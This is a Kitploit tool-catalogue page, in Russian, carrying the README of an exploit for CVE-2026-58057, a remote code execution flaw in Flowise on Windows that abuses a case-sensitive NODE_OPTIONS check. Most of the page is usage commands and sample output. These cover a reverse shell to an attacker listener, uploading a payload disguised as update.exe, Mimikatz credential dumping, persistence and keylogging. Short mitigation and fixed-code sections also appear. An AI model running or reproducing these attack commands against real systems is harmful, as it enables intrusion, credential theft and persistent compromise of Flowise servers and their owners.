Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Flowise-CVE-2026-58057-exploit — Flowise Windows RCE exploit for CVE-2026-58057. Bypasses environment variable validation via case-sensitive flaw. Uses node_options to inject arbitrary code through MCP stdio. Supports reverse shell, persistence, file upload, credential dumping. For authorized security testing only. | Kitploit
Инструменты/GitHubGitHub/cerberusmrxi/flowise-cve-2026-58057-exploit
Persistence MechanismsVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPost-ExploitationPenetration TestingCommand and ControlRed Teaming

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Payload Development
GitHubcerberusmrxi/flowise-cve-2026-58057-exploit

Flowise-CVE-2026-58057-exploit

Репозиторий
128 дней назадЕщё не проверено

Описание

Flowise Windows RCE exploit for CVE-2026-58057. Bypasses environment variable validation via case-sensitive flaw. Uses node_options to inject arbitrary code through MCP stdio. Supports reverse shell, persistence, file upload, credential dumping. For authorized security testing only.

Поделиться

Flowise CVE-2026-58057 - Эксплойт удаленного выполнения кода на Windows

Project Badge CVE Badge Author Badge Version Badge CVSS Score Badge Affected Versions Badge Fixed Version Badge

📋 Обзор

Это эксплойт производственного уровня для CVE-2026-58057 — критической уязвимости удаленного выполнения кода (RCE) в Flowise на платформе Windows. Уязвимость возникает из-за проверки переменных окружения с учетом регистра, которая не блокирует нижний регистр node_options, что позволяет злоумышленникам обойти черный список NODE_OPTIONS и выполнить произвольный код через конфигурацию Custom MCP stdio.

Эксплойт демонстрирует профессиональные инженерные практики: модульную архитектуру, всестороннюю обработку ошибок и поддержку нескольких типов полезных нагрузок.

f1

f2

⚠️ Отказ от ответственности

ВАЖНО: Этот инструмент предоставляется только для авторизованного тестирования безопасности, пентеста и образовательных целей. Автор не несет ответственности за любое неправомерное использование или ущерб, причиненный данным программным обеспечением. Всегда получайте надлежащее разрешение перед тестированием любой системы.

🔍 Технические детали

Первопричина уязвимости

root@kitploit:~
# Уязвимая проверка (с учетом регистра)
dangerous = {"PATH", "LD_LIBRARY_PATH", "DYLD_LIBRARY_PATH", "NODE_OPTIONS"}
if key in dangerous:  # Блокируется только точное совпадение в верхнем регистре
    raise ValueError(f"Modification not allowed")

Механизм эксплуатации

  1. Злоумышленник аутентифицируется в Flowise

  2. Создаёт/изменяет узел Custom MCP stdio

  3. Внедряет переменную окружения node_options в нижнем регистре

  4. Устанавливает значение --require malicious-loader.js

  5. Node.js выполняет загрузчик при запуске MCP stdio

  6. Достигается произвольное выполнение кода

✨ Возможности

Основные возможности

  • ✅ Reverse Shell — обратное подключение к машине атакующего

  • ✅ Bind Shell — открытие порта прослушивания на цели

  • ✅ Выполнение команд — запуск произвольных системных команд

  • ✅ Загрузка файлов — загрузка файлов в целевую систему

  • ✅ Сохранение доступа — несколько механизмов персистентности

  • ✅ Сбор информации — сбор данных о системе

  • ✅ Извлечение учётных данных — интеграция с Mimikatz

  • ✅ Захват скриншотов — снятие скриншотов рабочего стола

  • ✅ Кейлоггер — установка возможности записи нажатий клавиш

Технические особенности

  • 🔐 Несколько методов аутентификации — API-ключ или имя пользователя/пароль

  • 🔄 Автоматическая логика повтора — устойчивость к сетевым проблемам

  • 🧹 Самоочистка — удаление файлов загрузчика с цели

  • 🌐 Кроссплатформенность — работает на Windows/Linux/macOS

  • 🎨 Цветной вывод — улучшенная читаемость

  • 📊 Подробная отладка — детальное логирование для устранения неполадок

📦 Установка

Предварительные требования

  • Python 3.6 или выше

  • pip (менеджер пакетов Python)

Быстрая установка

root@kitploit:~
# Клонируйте репозиторий
git clone https://github.com/CerberusMrXi/Flowise-CVE-2026-58057-exploit
cd Flowise-CVE-2026-58057-exploit

# Установите зависимости
pip install -r requirements.txt

# Или минимальная установка
pip install requests urllib3

Установка через Docker (опционально)

root@kitploit:~
FROM python:3.9-alpine
RUN apk add --no-cache gcc musl-dev
COPY requirements.txt .
RUN pip install --no-cache-dir -r requirements.txt
COPY exploit.py .
ENTRYPOINT ["python3", "exploit.py"]

🚀 Использование

Параметры командной строки

root@kitploit:~
python3 exploit.py --help

Параметры аутентификации

Параметры полезной нагрузки

Параметры выполнения

ПараметрОписание
--interactiveЗапуск интерактивной оболочки
--verboseВключить отладочный вывод

📝 Примеры использования

1. Базовый Reverse Shell

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload reverse_shell \
    --lhost 192.168.1.50 \
    --lport 4444

2. Интерактивный Reverse Shell

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -u admin -p password \
    --payload reverse_shell \
    --lhost 192.168.1.50 \
    --lport 4444 \
    --interactive

3. Выполнение команды

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload command_exec \
    --command "whoami"

4. Загрузка файла

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload file_upload \
    --local-file /path/to/payload.exe \
    --remote-path "C:\\ProgramData\\update.exe"

5. Извлечение учётных данных (Mimikatz)

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload mimikatz

6. Установка персистентности

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload persistence

7. Сбор информации

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -u admin -p password \
    --payload info_gather

8. Захват скриншота

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload screenshot

🎯 Типы полезных нагрузок

🛡️ Меры защиты

Обновление Flowise

root@kitploit:~
# Обновите до версии 3.1.3 или новее
npm install -g flowise@latest
# или
docker pull flowiseai/flowise:latest

Обходные меры

  • Ограничьте доступ к конфигурации Custom MCP

  • Внедрите сегментацию сети

  • Отслеживайте подозрительные переменные окружения

  • Используйте Web Application Firewall (WAF)

Исправленный код

root@kitploit:~
# Исправленная проверка (без учета регистра)
dangerous = {"PATH", "LD_LIBRARY_PATH", "DYLD_LIBRARY_PATH", "NODE_OPTIONS"}
if key.upper() in dangerous:  # Проверка без учета регистра
    raise ValueError(f"Modification not allowed")

📊 Примеры вывода

Успешный эксплойт

root@kitploit:~
[14:32:15] ℹ Starting exploit sequence...
[14:32:15] ℹ Attempting authentication...
[14:32:16] ✓ Authenticated with API key
[14:32:16] ℹ Preparing reverse_shell payload execution...
[14:32:16] ℹ Injecting environment variable...
[14:32:17] ℹ Triggering payload execution...
[14:32:19] ✓ Payload 'reverse_shell' executed successfully!
[14:32:19] ℹ Reverse shell listener ready on 192.168.1.50:4444

Подробный режим

root@kitploit:~
[14:32:15] 🔍 Session created with retry strategy
[14:32:15] 🔍 Using existing workspace: ws_123456
[14:32:16] 🔍 Loader written: /tmp/loader_1234_1234567890.js
[14:32:16] 🔍 MCP stdio configuration updated

🐛 Устранение неполадок

Частые проблемы

Отладочные команды

root@kitploit:~
# Включить подробное логирование
python3 exploit.py -t http://localhost:3000 -k API_KEY --verbose

# Проверить подключение
curl -k https://localhost:3000/api/v1/version

# Проверить версию Python
python3 --version

📁 Структура файлов

root@kitploit:~
flowise-CVE-2026-58057-exploit/
├── exploit.py          # Основной скрипт эксплойта
├── requirements.txt    # Основные зависимости
├── README.md          # Эта документация
├── LICENSE            # Лицензия MIT
└── CHANGELOG.md       # История версий

🤝 Вклад в проект

  1. Сделайте форк репозитория

  2. Создайте ветку для функции (git checkout -b feature/amazing)

  3. Зафиксируйте изменения (git commit -m 'Add amazing feature')

  4. Отправьте в ветку (git push origin feature/amazing)

  5. Откройте Pull Request

📜 Лицензия

Этот проект лицензирован по лицензии MIT — см. файл LICENSE для подробностей.

🏆 Благодарности

  • FlowiseAI за продукт

  • Исследователям безопасности, обнаружившим подобные уязвимости

  • Сообществу пентестеров за методологии тестирования

🔗 Ссылки

  • CVE-2026-58057

  • Репозиторий Flowise на GitHub

  • Документация Flowise

  • Безопасность переменных окружения Node.js

📧 Контакты

Автор: Sudeepa Wanigarathna Исследователь безопасности и пентестер

⭐ Поддержка

Если вы нашли этот инструмент полезным, пожалуйста, рассмотрите:

  • ⭐ Оценить репозиторий на GitHub

  • 🔔 Подписаться на обновления

  • 📝 Сообщить об ошибках или предложениях


Сделано с ❤️ для сообщества безопасности

Скачать инструмент
ПараметрОписаниеПример
-t, --targetURL Flowise (обязательно)http://localhost:3000
-k, --api-keyAPI-ключ Flowiseflowise_abc123...
-u, --usernameИмя пользователяadmin
-p, --passwordПарольpassword123
ПараметрОписаниеПример
--payloadТип полезной нагрузкиreverse_shell
--lhostХост слушателя192.168.1.100
--lportПорт слушателя4444
--commandКоманда для выполненияwhoami
--local-fileФайл для загрузкиpayload.exe
--remote-pathУдаленный путь сохраненияC:\\Temp\\update.exe
--timeout
Тайм-аут запроса в секундах
--retriesКоличество попыток повтора
Полезная нагрузкаОписаниеАргументы
reverse_shellОбратное подключение к слушателю--lhost, --lport
bind_shellОткрытие порта прослушивания--lport
command_execВыполнение команды--command
file_uploadЗагрузка файла на цель--local-file, --remote-path
persistenceУстановка персистентностиНет
info_gatherСбор информации о системеНет
mimikatzИзвлечение учётных данныхНет
screenshotЗахват скриншотаНет
keyloggerУстановка кейлоггераНет
ПроблемаРешение
Ошибка SSL-сертификатаpip install --trusted-host pypi.org -r requirements.txt
Отказано в доступеpip install --user -r requirements.txt
Соединение отклоненоПроверьте URL цели и сетевое подключение
Сбой аутентификацииПроверьте API-ключ или имя пользователя/пароль
Полезная нагрузка не срабатываетИспользуйте --verbose для детальной отладки
Версия PythonУбедитесь, что установлен Python 3.6+